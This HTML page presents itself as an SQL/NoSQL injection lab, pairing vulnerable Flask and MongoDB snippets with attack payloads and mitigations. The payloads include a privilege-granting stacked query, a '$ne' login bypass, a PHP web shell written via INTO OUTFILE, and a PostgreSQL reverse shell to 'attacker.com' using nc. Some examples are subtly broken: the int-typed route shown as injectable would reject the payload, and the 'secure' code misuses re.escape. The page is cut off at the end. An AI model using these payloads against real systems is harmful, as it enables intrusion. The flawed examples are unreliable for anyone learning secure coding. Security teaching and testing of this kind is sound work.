| | <!DOCTYPE html> |
| | <html lang="en"> |
| | <head> |
| | <meta charset="UTF-8"> |
| | <meta name="viewport" content="width=device-width, initial-scale=1.0"> |
| | <title>SQL/NoSQL Injection Exploitation Lab</title> |
| | <script src="https://cdn.tailwindcss.com"></script> |
| | <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"> |
| | <style> |
| | .terminal { |
| | font-family: 'Courier New', monospace; |
| | background-color: #1e1e1e; |
| | color: #f8f8f2; |
| | border-radius: 0.5rem; |
| | padding: 1.5rem; |
| | overflow-x: auto; |
| | position: relative; |
| | } |
| | .terminal-header { |
| | background-color: #2d2d2d; |
| | padding: 0.5rem 1rem; |
| | border-top-left-radius: 0.5rem; |
| | border-top-right-radius: 0.5rem; |
| | display: flex; |
| | align-items: center; |
| | } |
| | .terminal-dot { |
| | width: 12px; |
| | height: 12px; |
| | border-radius: 50%; |
| | margin-right: 6px; |
| | } |
| | .terminal-red { background-color: #ff5f56; } |
| | .terminal-yellow { background-color: #ffbd2e; } |
| | .terminal-green { background-color: #27c93f; } |
| | .terminal-cursor { |
| | display: inline-block; |
| | width: 8px; |
| | height: 16px; |
| | background-color: #f8f8f2; |
| | animation: blink 1s infinite; |
| | } |
| | @keyframes blink { |
| | 0%, 100% { opacity: 1; } |
| | 50% { opacity: 0; } |
| | } |
| | .code-block { |
| | font-family: 'Courier New', monospace; |
| | background-color: #2d2d2d; |
| | color: #f8f8f2; |
| | border-radius: 0.5rem; |
| | padding: 1rem; |
| | overflow-x: auto; |
| | position: relative; |
| | } |
| | .tab-content { |
| | display: none; |
| | } |
| | .tab-content.active { |
| | display: block; |
| | animation: fadeIn 0.3s ease-in-out; |
| | } |
| | @keyframes fadeIn { |
| | from { opacity: 0; } |
| | to { opacity: 1; } |
| | } |
| | .attack-card { |
| | transition: all 0.3s ease; |
| | } |
| | .attack-card:hover { |
| | transform: translateY(-5px); |
| | box-shadow: 0 10px 25px rgba(0, 0, 0, 0.1); |
| | } |
| | .blink { |
| | animation: blink 1s infinite; |
| | } |
| | </style> |
| | </head> |
| | <body class="bg-gray-900 text-gray-100 min-h-screen"> |
| | <div class="container mx-auto px-4 py-8"> |
| | |
| | <div class="terminal mb-8"> |
| | <div class="terminal-header"> |
| | <div class="terminal-dot terminal-red"></div> |
| | <div class="terminal-dot terminal-yellow"></div> |
| | <div class="terminal-dot terminal-green"></div> |
| | <div class="ml-2 text-sm">pentester@secure-lab:~/sql_injection/_</div> |
| | </div> |
| | <div class="mt-2"> |
| | <div class="text-green-400">$ <span class="typing-text"></span><span class="terminal-cursor"></span></div> |
| | <div id="terminal-output" class="mt-4"></div> |
| | </div> |
| | </div> |
| |
|
| | |
| | <div class="grid grid-cols-1 lg:grid-cols-2 gap-8 mb-12"> |
| | |
| | <div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden attack-card"> |
| | <div class="p-6"> |
| | <div class="flex items-center mb-4"> |
| | <div class="bg-red-900 p-3 rounded-full mr-4"> |
| | <i class="fas fa-user-shield text-red-400 text-xl"></i> |
| | </div> |
| | <h2 class="text-2xl font-bold text-white">Privilege Escalation</h2> |
| | </div> |
| | |
| | <div class="mb-6"> |
| | <h3 class="text-lg font-semibold text-gray-300 mb-3">SQL Injection</h3> |
| | <div class="code-block mb-2"> |
| | <span class="text-gray-400"># Vulnerable Flask endpoint</span><br> |
| | @app.route('/user/<int:user_id>')<br> |
| | def get_user(user_id):<br> |
| | query = f"SELECT * FROM users WHERE id = {user_id}"<br> |
| | result = db.execute(query)<br> |
| | return jsonify(result.fetchall())<br><br> |
| | <span class="text-gray-400"># Attack payload:</span><br> |
| | /user/1; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' IDENTIFIED BY 'pwned123'-- |
| | </div> |
| | </div> |
| | |
| | <div class="mb-6"> |
| | <h3 class="text-lg font-semibold text-gray-300 mb-3">NoSQL Injection</h3> |
| | <div class="code-block mb-2"> |
| | <span class="text-gray-400">// Vulnerable MongoDB query</span><br> |
| | db.users.find({<br> |
| | username: req.body.username,<br> |
| | password: req.body.password<br> |
| | });<br><br> |
| | <span class="text-gray-400">// Attack payload (JSON):</span><br> |
| | {<br> |
| | "username": {"$ne": null},<br> |
| | "password": {"$ne": null}<br> |
| | } |
| | </div> |
| | </div> |
| | </div> |
| | </div> |
| |
|
| | |
| | <div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden attack-card"> |
| | <div class="p-6"> |
| | <div class="flex items-center mb-4"> |
| | <div class="bg-blue-900 p-3 rounded-full mr-4"> |
| | <i class="fas fa-terminal text-blue-400 text-xl"></i> |
| | </div> |
| | <h2 class="text-2xl font-bold text-white">Command Execution</h2> |
| | </div> |
| | |
| | <div class="mb-6"> |
| | <h3 class="text-lg font-semibold text-gray-300 mb-3">MySQL Command Execution</h3> |
| | <div class="code-block mb-2"> |
| | <span class="text-gray-400">-- Enable command execution</span><br> |
| | SELECT * FROM users WHERE id = 1;<br> |
| | SELECT sys_exec('whoami'); --<br><br> |
| | <span class="text-gray-400">-- Writing web shell</span><br> |
| | SELECT '<?php system($_GET["cmd"]); ?>'<br> |
| | INTO OUTFILE '/var/www/html/shell.php'; -- |
| | </div> |
| | </div> |
| | |
| | <div class="mb-6"> |
| | <h3 class="text-lg font-semibold text-gray-300 mb-3">PostgreSQL Exploitation</h3> |
| | <div class="code-block mb-2"> |
| | <span class="text-gray-400"># Vulnerable Flask code</span><br> |
| | @app.route('/search')<br> |
| | def search():<br> |
| | query = request.args.get('q')<br> |
| | sql = f"SELECT * FROM products WHERE name LIKE '%{query}%'"<br> |
| | return execute_query(sql)<br><br> |
| | <span class="text-gray-400"># Attack payload:</span><br> |
| | /search?q='; COPY (SELECT '') TO PROGRAM 'nc -e /bin/bash attacker.com 4444'; -- |
| | </div> |
| | </div> |
| | </div> |
| | </div> |
| | </div> |
| |
|
| | |
| | <div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden mb-12"> |
| | <div class="p-6"> |
| | <h2 class="text-2xl font-bold text-white mb-6">Secure Mitigation Strategies</h2> |
| | |
| | <div class="grid grid-cols-1 md:grid-cols-2 gap-6"> |
| | <div class="bg-gray-700 p-4 rounded-lg border border-gray-600"> |
| | <div class="flex items-center mb-3"> |
| | <i class="fas fa-shield-alt text-green-400 mr-3"></i> |
| | <h3 class="text-lg font-semibold text-white">SQLAlchemy ORM</h3> |
| | </div> |
| | <div class="code-block text-sm"> |
| | <span class="text-gray-400"># SECURE: Using SQLAlchemy ORM</span><br> |
| | @app.route('/user/<int:user_id>')<br> |
| | def get_user_secure(user_id):<br> |
| | user = User.query.filter_by(id=user_id).first()<br> |
| | if user:<br> |
| | return jsonify({<br> |
| | 'id': user.id,<br> |
| | 'username': user.username<br> |
| | })<br> |
| | return jsonify({'error': 'User not found'}), 404 |
| | </div> |
| | </div> |
| | |
| | <div class="bg-gray-700 p-4 rounded-lg border border-gray-600"> |
| | <div class="flex items-center mb-3"> |
| | <i class="fas fa-lock text-green-400 mr-3"></i> |
| | <h3 class="text-lg font-semibold text-white">NoSQL Injection Prevention</h3> |
| | </div> |
| | <div class="code-block text-sm"> |
| | <span class="text-gray-400"># SECURE: NoSQL injection prevention</span><br> |
| | def authenticate_user_secure(username, password):<br> |
| | if not isinstance(username, str):<br> |
| | return None<br> |
| | username = re.escape(username)<br> |
| | user = db.users.find_one({<br> |
| | 'username': username,<br> |
| | 'password': hash_password(password)<br> |
| | })<br> |
| | return user |
| | </div> |
| | </div> |
| | </div> |
| | </div> |
| | </div> |
| |
|
| | |
| | <div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden"> |
| | < |
| | </html> |
